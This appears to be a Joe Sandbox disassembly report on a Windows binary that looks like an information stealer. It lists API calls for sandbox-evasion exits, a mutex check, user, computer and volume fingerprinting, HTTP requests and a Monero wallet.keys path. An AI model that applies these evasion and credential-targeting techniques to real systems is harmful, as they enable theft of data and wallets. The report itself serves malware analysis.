                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                          • Instruction ID: 5a177d458226dcc38ccf78542989660d096b988be3e639be12728353077dd10b
                          • Opcode Fuzzy Hash: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                          • Instruction Fuzzy Hash: 2DE16471910505AADB04FBB0DC7ADED7B38BF94301F50822AB90756491FF346A4DCBA6

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 5517a0-5517cd call 55aad0 StrCmpCA 1304 5517d7-5517f1 call 55aad0 1301->1304 1305 5517cf-5517d1 ExitProcess 1301->1305 1309 5517f4-5517f8 1304->1309 1310 5519c2-5519cd call 55a800 1309->1310 1311 5517fe-551811 1309->1311 1312 551817-55181a 1311->1312 1313 55199e-5519bd 1311->1313 1315 551835-551844 call 55a820 1312->1315 1316 5518f1-551902 StrCmpCA 1312->1316 1317 551951-551962 StrCmpCA 1312->1317 1318 551970-551981 StrCmpCA 1312->1318 1319 551913-551924 StrCmpCA 1312->1319 1320 551932-551943 StrCmpCA 1312->1320 1321 55185d-55186e StrCmpCA 1312->1321 1322 55187f-551890 StrCmpCA 1312->1322 1323 551821-551830 call 55a820 1312->1323 1324 5518ad-5518be StrCmpCA 1312->1324 1325 5518cf-5518e0 StrCmpCA 1312->1325 1326 55198f-551999 call 55a820 1312->1326 1327 551849-551858 call 55a820 1312->1327 1313->1309 1315->1313 1333 551904-551907 1316->1333 1334 55190e 1316->1334 1339 551964-551967 1317->1339 1340 55196e 1317->1340 1342 551983-551986 1318->1342 1343 55198d 1318->1343 1335 551926-551929 1319->1335 1336 551930 1319->1336 1337 551945-551948 1320->1337 1338 55194f 1320->1338 1348 551870-551873 1321->1348 1349 55187a 1321->1349 1350 551892-55189c 1322->1350 1351 55189e-5518a1 1322->1351 1323->1313 1329 5518c0-5518c3 1324->1329 1330 5518ca 1324->1330 1331 5518e2-5518e5 1325->1331 1332 5518ec 1325->1332 1326->1313 1327->1313 1329->1330 1330->1313 1331->1332 1332->1313 1333->1334 1334->1313 1335->1336 1336->1313 1337->1338 1338->1313 1339->1340 1340->1313 1342->1343 1343->1313 1348->1349 1349->1313 1352 5518a8 1350->1352 1351->1352 1352->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 005517C5
                          • ExitProcess.KERNEL32 ref: 005517D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: ecac5ca3af7dc88f869d8facffee70185fc94a6df276e9854900a6d7f71544c9
                          • Instruction ID: 9718d430643462fc169efdcf7e45ef393aae361b98d3e65a5e26ff3b68ad1b62
                          • Opcode Fuzzy Hash: ecac5ca3af7dc88f869d8facffee70185fc94a6df276e9854900a6d7f71544c9
                          • Instruction Fuzzy Hash: A75180B4A00209EFDB04DFA0D964BBE7FB5BF44705F10854EE906A7280D774E949CB66

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 557500-55754a GetWindowsDirectoryA 1357 557553-5575c7 GetVolumeInformationA call 558d00 * 3 1356->1357 1358 55754c 1356->1358 1365 5575d8-5575df 1357->1365 1358->1357 1366 5575e1-5575fa call 558d00 1365->1366 1367 5575fc-557617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 557619-557626 call 55a740 1367->1368 1369 557628-557658 wsprintfA call 55a740 1367->1369 1377 55767e-55768e 1368->1377 1369->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00557542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0055757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0055760A
                          • wsprintfA.USER32 ref: 00557640
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$V
                          • API String ID: 1544550907-271220574
                          • Opcode ID: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                          • Instruction ID: 871dd97918fa2740fbfea29058f5f3ac6086560c7843153b6e4e508ef4be1c59
                          • Opcode Fuzzy Hash: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                          • Instruction Fuzzy Hash: CA4194B1D04248ABDF10DF94DC59BEEBBB8FF48701F10419AF90567280E7786A48CBA5

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012316B0), ref: 005598A1
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012315D8), ref: 005598BA
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012314E8), ref: 005598D2
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231500), ref: 005598EA
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231560), ref: 00559903
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01238908), ref: 0055991B
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01225628), ref: 00559933
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012255A8), ref: 0055994C
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231608), ref: 00559964
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012316C8), ref: 0055997C
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231770), ref: 00559995
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231758), ref: 005599AD
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01225608), ref: 005599C5
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231530), ref: 005599DE
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 005411D0: ExitProcess.KERNEL32 ref: 00541211
                            • Part of subcall function 00541160: GetSystemInfo.KERNEL32(?), ref: 0054116A
                            • Part of subcall function 00541160: ExitProcess.KERNEL32 ref: 0054117E
                            • Part of subcall function 00541110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                            • Part of subcall function 00541110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                            • Part of subcall function 00541110: ExitProcess.KERNEL32 ref: 00541143
                            • Part of subcall function 00541220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                            • Part of subcall function 00541220: __aulldiv.LIBCMT ref: 00541258
                            • Part of subcall function 00541220: __aulldiv.LIBCMT ref: 00541266
                            • Part of subcall function 00541220: ExitProcess.KERNEL32 ref: 00541294
                            • Part of subcall function 00556770: GetUserDefaultLangID.KERNEL32 ref: 00556774
                            • Part of subcall function 00541190: ExitProcess.KERNEL32 ref: 005411C6
                            • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                            • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                            • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                            • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                            • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                            • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01238928,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                          • Sleep.KERNEL32(00001770), ref: 00556B04
                          • CloseHandle.KERNEL32(?,00000000,?,01238928,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                          • ExitProcess.KERNEL32 ref: 00556B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                          • Instruction ID: 6497a6133172337643a503fd40492882b901ac90d3a50e916afcc4b435b2b13e
                          • Opcode Fuzzy Hash: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                          • Instruction Fuzzy Hash: EE31527094010AAADB04F7F0DC6EBEE7F78BF84342F50461AF902A2181EF746509C7A6

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 541220-541247 call 5589b0 GlobalMemoryStatusEx 1439 541273-54127a 1436->1439 1440 541249-541271 call 55da00 * 2 1436->1440 1442 541281-541285 1439->1442 1440->1442 1444 541287 1442->1444 1445 54129a-54129d 1442->1445 1447 541292-541294 ExitProcess 1444->1447 1448 541289-541290 1444->1448 1448->1445 1448->1447
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                          • __aulldiv.LIBCMT ref: 00541258
                          • __aulldiv.LIBCMT ref: 00541266
                          • ExitProcess.KERNEL32 ref: 00541294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                          • Instruction ID: 0dbb06116785e83c430c4a204ab77aa88386feadc157b5320cfcc0780325ca52
                          • Opcode Fuzzy Hash: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                          • Instruction Fuzzy Hash: 20014FB0948308BAEB10DBD0CC49B9EBB78BB44705F208055E705F6180D7B46585875D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 556af3 1451 556b0a 1450->1451 1453 556b0c-556b22 call 556920 call 555b10 CloseHandle ExitProcess 1451->1453 1454 556aba-556ad7 call 55aad0 OpenEventA 1451->1454 1459 556af5-556b04 CloseHandle Sleep 1454->1459 1460 556ad9-556af1 call 55aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01238928,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                          • Sleep.KERNEL32(00001770), ref: 00556B04
                          • CloseHandle.KERNEL32(?,00000000,?,01238928,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                          • ExitProcess.KERNEL32 ref: 00556B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                          • Instruction ID: 6832f25de47d9b0ab20a7ceae4a5ab06024d8dad58e542e5f6e24febdfe2fbd0
                          • Opcode Fuzzy Hash: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                          • Instruction Fuzzy Hash: 4FF0307094024AAAF700ABA0DC2AB7D7E74FB04712F608917BD03A2191DBB46548D656

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: a3208f523a7804ccbbcfc766ad330b2d21822bb2a0dfbcd8b441b99869676247
                          • Instruction ID: 6d6a1d04f2dde0397d92ba67d567f2eaeb3e4d5c0cb74bec4835e5c51c079b9a
                          • Opcode Fuzzy Hash: a3208f523a7804ccbbcfc766ad330b2d21822bb2a0dfbcd8b441b99869676247
                          • Instruction Fuzzy Hash: 8B211DB1D00209ABDF14DFA4E949ADD7B78FB45321F108226F925A72D0EB706A09CF91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                            • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00546303
                            • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                            • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0123F440,00000000,00000000,00400100,00000000), ref: 00546385
                            • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                            • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                          • Instruction ID: e6d16ada3ff708b3ce11cb7c9bdf117ce77cad8381cca31ccfdf90c49b6b87bf
                          • Opcode Fuzzy Hash: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                          • Instruction Fuzzy Hash: 03111F30910449A7CB14FF70DD6AAED7B38BF90301F408655FC1A46592EF306B09CB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
